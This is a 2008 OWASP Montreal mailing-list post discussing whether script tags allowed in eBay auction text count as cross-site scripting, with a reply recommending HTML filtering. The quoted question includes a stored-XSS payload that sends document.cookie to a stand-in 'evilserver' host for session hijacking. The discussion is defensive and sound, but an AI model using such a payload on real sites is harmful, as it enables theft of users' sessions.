[ OWASP - Montreal ] Confusion about XSS...

Sean Coates sean at caedmon.net
Wed Dec 17 14:13:44 EST 2008

> Am I wrong, or to be declared as XSS vuln. the script must be  
> injected from an external source, not the site itself?
> What if ebay allow html script tags in the auction text, is it an  
> XSS? If not how do you call this? The site is the source...
> "Watch for sale. <script type="text/javascript">document.location="http://evilserver/stealcookie.php? 
> "%2bdocument.cookie</script>"
> This script would send the authenticated user cookie to the  
> attacker, allowing session hijacking.

I would consider that a form of cross site scripting, even if it's not  
technically "cross site." eBay definitely should be filtering that  
out... think "Samy is my hero."

This is where HtmlPurifier serves well (-:


-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-montreal/attachments/20081217/5e2e85b9/attachment.html 

More information about the Owasp-montreal mailing list